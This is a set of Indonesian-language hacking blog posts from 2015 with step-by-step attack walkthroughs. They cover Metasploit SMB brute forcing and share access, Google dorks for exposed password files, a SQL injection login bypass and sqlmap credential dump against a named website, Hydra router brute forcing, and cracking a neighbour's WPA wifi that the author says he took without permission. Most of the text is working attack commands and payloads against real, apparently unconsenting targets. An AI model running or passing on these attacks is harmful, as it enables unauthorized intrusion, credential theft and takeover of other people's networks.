Minggu, 22 Maret 2015

Welcome back to my article

Begitu banyak exploit yang bisa dimanfaatkan dari port 445, salah satunya yang saya tuliskan ini adalah pembahasan satu dari ratusan cara menguji server yang menggunakan samba.
Untuk pengertian samba sendiri tidak jauh berbeda dengan FTP, kamu bisa memahami lebih detail di artikel yang berbeda.

Oke, untuk tool yang dibutuhkan

  • nmap
  • metasploit
  • smbclient

NOTE : Untuk menjaga keaman privasi, dalam artikel IP sudah saya ganti. 
Scan dulu target menggunakan nmap, untu melihat port berapa saja yang terbuka

root@kali:~# nmap -O -sV 36.81.114.36


Yapp, ada port 445 yang terbuka, kita lihat lebih detail tentang host samba target, kalian bisa menambahkan option script dengan script-file smb-os-discovery

root@kali:~# nmap -O -sV 36.81.114.36 --script=smb-os-discovery -p 445


Oke catatan sudah terkumpul. 
Untuk mengetahui password yang digunakan oleh target saya akan memakai bantuan metasploit guna melakukan bruteforce

msf > use auxiliary/scanner/smb/smb_login
msf auxiliary(smb_login) > set RHOSTS 36.81.114.36
RHOSTS => 36.81.114.36
msf auxiliary(smb_login) > set USER_FILE wordlist/user.txt
USER_FILE => wordlist/user.txt
msf auxiliary(smb_login) > set PASS_FILE wordlist/listpassword.txt
PASS_FILE => wordlist/listpassword.txt
msf auxiliary(smb_login) > run

[*] 36.81.114.36:445 SMB - Starting SMB login bruteforce
[*] 36.81.114.36 - This system allows guest sessions with any credentials
... snip ...
[+]
36.81.114.36:445 SMB - Success: 'WORKSTATION\SMILE:serverdusatu' Guest
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Next step, lakukan connect untuk melihat folder yang di share oleh si target
smbclient -L [ ip target ] -U [ computer name ] -p 445

root@kali:~# smbclient -L 36.81.114.36 -U serverdusatu -p 445



Ada 2 folder yang di share, coba kita akses salah satu 
smbclient //[ip target]/[folder] -U [computer name] -p 445

root@kali:~# smbclient //36.81.114.36/Users -U serverdusatu -p 445



Jika berhasil akan tampak seperti gambar di atas.
Regards : Altiiever


Posted on 08.02 by kakanDani

No comments

Sabtu, 28 Februari 2015

Sudah sering mendengar kata google dork?
Tentu, mungkin hanya sekedar, tetapi belum mengetahui banyak rahasia yang masih tersimpan. Dan yang saya tuliskan sekarang adalah apa saja kata yang dipakai untuk mencari informasi sensitiv dari target kita.

Simpel penjelasan saja untuk fungsinya, karena sudah banyak bertebaran di google.

inurl
Mencari string yang terdapat pada URL

intext
Menemukan kata yang kita cari pada website

intitle
Mencari judul dari isi website

filetype
Mencari ekstensi sebuah file yang tersimpan di dalam website

site
Lebih memfokuskan pencarian pada situs yang kita cari

link
Mengetahui link website lain dalam isi website

Untuk mencari subdomain yang bersifat public
site:target.com -site:www.target.com


1. Mencari Listening Vulnerable Website

Mengetahui listening index website
intitle:"index /of" intext:"Parent Directory" site:target.com

Menemukan listening direktori admin
intitle:"Index of /admin" site:target.com

Menemukan listening direktori password
intitle:"Index of /password" site:target.com

Menemukan file penting seperti passwd
intitle:"Index of /" passwd site:target.com

Mencari file password.txt
intitle:"Index of /" password.txt site:target.com

Mencari .htaccess file
intitle:"Index of /" .htaccess site:target.com


2. Menemukan direktori login

- intitle:"Admin","Login" site:target.com

- inurl:"login" site:target.com

- inurl:"admin" site:target.com

- intext:"username","password","admin login" site:target.com

Untuk memaksimalkan hasil pencarian, kamu bisa mengubah kata admin menjadi administrator atau apapun yang memungkinkan keberhasilan.


3. Mencari file website

- inurl:passwd filetype:txt site:target.com

- inurl:admin filetype:db site:target.com

- inurl:user filetype:sql site:target.com

- filetype:xls csv doc pdf site:target.com

Kembangkan lebih kreativitas, putar kembali otak kita. Masih banyak jalan untuk bersenang-senang =))


Regards : Altiiever

Posted on 01.22 by kakanDani

No comments

Senin, 23 Februari 2015



Jika kalian berpikir command login backtrack terkesan lebih menarik dari login kali linux, demikian juga saya. Walaupun terlihat 'ruwet' tetapi itulah yang menjadi daya tarik dari seorang hacker,cracker, atau entah apalah, karena kode yang kelihatan membingungkan adalah pemandangan pokok untuk kalian, hehe.
Langsung ke pembahasan.

Step pertama, install chkconfig dan buat link gdm3 dengan startx

apt-get install chkconfig -y
ln -s /usr/sbin/gdm3 /usr/bin/startx


Setelah itu, coba lihat status yang sedang berjalan, disini saya memakai gdm3, jika kamu memakai KDE desktop, cari servis KDE.

chkconfig -l


Selanjutnya, hapus gdm3 dari list tadi, lalu restart

chkconfig --del gdm3
reboot


Selesai, dari sini sesudah kamu restart maka tampilan login menjadi klasik seperti backtrack, untuk menjalankan desktop cukup mengetikkan startx 

Jika ingin kembali ke tampilan awal, ketik command seperti ini

chkconfig --add gdm3
reboot


Done =))

Posted on 14.52 by kakanDani

No comments

Selasa, 27 Januari 2015

Welcome back dude.
January is my special month, especialy today. I'm happy =))

Oke, langsung ke pembahasan. Saya akan membagikan sedikit tambahan tentang kombinasi antara kemanfaatan dua tool yang kadang saya gunakan untuk mendapatkan target saya.

  • Burpsuite
  • Sqlmap

Disini adalah kebingungan ketika kita mencari letak vulnerable parameter yang dikirimkan ke server karena si victim menggunakan basis data html. Maka step pertama yang saya lakukan adalah mencari tempat login si admin.
Oke, saya anggap kamu sudah mengetahui tempat loginnya.

Setting dulu kedua alat tadi, seperti ini.

Firefox -> Edit -> Preferences -> Advanced -> Network -> Setting -> Pilih Manual Proxy Configuration. Set HTTP PROXY dengan 0.0.0.0 dan PORT 8080

Burpsuite -> Tab Proxy -> Intercept -> Intercept is off


Login, agar burpsuite mencatat http request yang dikirim ke server dari website target



Treng!! username or password is incorrect, hahaha. Tidak apa-apa karena burpsuite sudah mencatat datanya.



Block tulisan seperti diatas, lalu tekan CTRL+ I
Pergi ke Intruder, kamu akan melihat catatan data tadi.
Kemudian Setting tab Position dan Payloads seperti gambar dibawah




Block data yang dikirim oleh parameter username dan password saja




Set payload type menjadi Runtime file dan load file bypass sql injection injection kamu.
Jika sudah klik menu Intruder -> Start attack


Respon 200 dan 302 disini hampir sama-sama memberikan hasil yang positif walaupun tidak semua, periksa lagi jika kamu melakukannya pada lain target.

Saya ambil seperti hasil scan diatas, dan mencoba login kembali

Username : ' or 1=1 limit 1 -- -+
Password  : ' or 1=1 limit 1 -- -+


Hasil dari login menunjukkan bahwa target mempunyai celah sql injection



Sampai disini kamu telah mengetahui letak yang bisa di inject. Step selanjutnya mari gunakan sqlmap
Kembali ke http respond, kita copy data yang dikirim ke server tadi

  • username=admin&password=admin&Input=Submit

sqlmap -u "http://eassenugu.com/rear/proccess_login.php" --data "username=admin&password=admin&Input=Submit" -p username --dbms mysql --dbs


Snip.. Snipp..

Saat mencari isi database, tables, columns tidak saya gambarkan disini, karena terlalu panjang

DB : digitav2_easse
Tables : setup
Columns : username,password

sqlmap -u "http://eassenugu.com/rear/proccess_login.php" --data "username=admin&password=admin&Input=Submit" -p username --dbms mysql -D digitav2_easse -T setup -C username,password --dump

username : admin, password : website. Untuk membuktikannya coba login kembali


Yeah, you now admin !!



Thanks : R-N for today =)) 

Posted on 08.56 by kakanDani

No comments

Sabtu, 17 Januari 2015

Hai kamu... ya kamu =)) =))
Postingan kali ini adalah kelanjutan dari post sebelumnya, yang kemarin saya jelaskan bagaimana mendapatkan password wi-fi. Sekarang saya akan tunjukkan bagaimana mendapatkan hak akses tertinggi wi-fi dengan cara menembus password router.

Oke, requirement tools

  • Brain
  • Hydra ( Available on Backtrack & Kali Linux ) 

Langsung saja

Checking koneksi dahulu

iwconfig wlan0


Next step, saya akan menggunakan hydra untuk bruteforce password.

hydra -l admin -P wordlist/listpassword.txt 192.168.1.1 http-get -m /

Jika berhasil akan tampak seperti ini




Keterangan :
  • l               : username
  • P              : path list password
  • http-get   : script yang digunakan untuk brute router
  • m             :  tidak diikut sertakan, tidak masalah

Untuk kebenaran tool, mari kita cocokkan




w00tz!! router taken over, selanjutnya merubah password,ssid atau lainnya terserah kamu =))

Posted on 07.46 by kakanDani

1 comment

Rabu, 14 Januari 2015

Haloo pemirsa..
Kali ini saya akan mem-post artikel bagaimana cara membobol password wifi. Bermula dari signal speed yang akhir ini sangat lemot di daerah saya, akhirnya saya berinisiatif membobol wifi tetangga. Bisa saya sebut dengan wifi imigration, hehe.

Walkthrough.

Pertama saya melakukan "Scanning SSID" untuk mencatat beberapa informasi seperti essid,bssid,dan channel.

iwlist [interface ] scanning

root@dani:[~]# iwlist wlan0 scanning

 

* Kotak merah adalah bssid target

Langkah kedua adalah menghentikan interface yang sedang berjalan, agar tidak mengganggu saat menggunakan proses airodump dan aireplay.

root@dani:[~]# airmon-ng check kill


Lanjutkan dengan perintah

airmon-ng start [ interface ]

root@dani:[~]# airmon-ng start wlan0


Pesan (monitor mode enabled on mon0) menunjukkan bahwa interface baru saya adalah mon0

Kemudian jalankan perintah airodump-ng untuk me-monitor dan menyimpan hasil yang nanti akan kamu pecahkan passwordnya

airodump-ng --write Wifi-ku --channel 1 --bssid F4:EC:38:C5:1C:C4 mon0


Biarkan berjalan, buka terminal baru lalu masukkan perintah aireplay-ng untuk mendapatkan WPA handshake

aireplay-ng -0 1 -a F4:EC:38:C5:1C:C4 -c 44:6D:57:79:82:C6 -e Wif-ku mon0

* Option -c diisi dengan Station yang muncul

Jika berhasil akan tampak seperti gambar dibawah

 

Jika sudah mendapatkan WPA handshake hentikan proses menggunakan ctrl+c.
Last step, memecahkan file yang berisi password wifi menggunakan aircrack-ng

aircrack-ng [ .cap file ] -w [ wordlist password ]

aircrack-ng Wifi-ku-01.cap -w wordlist/small-list.txt


Password cracked =))

Posted on 03.07 by kakanDani

No comments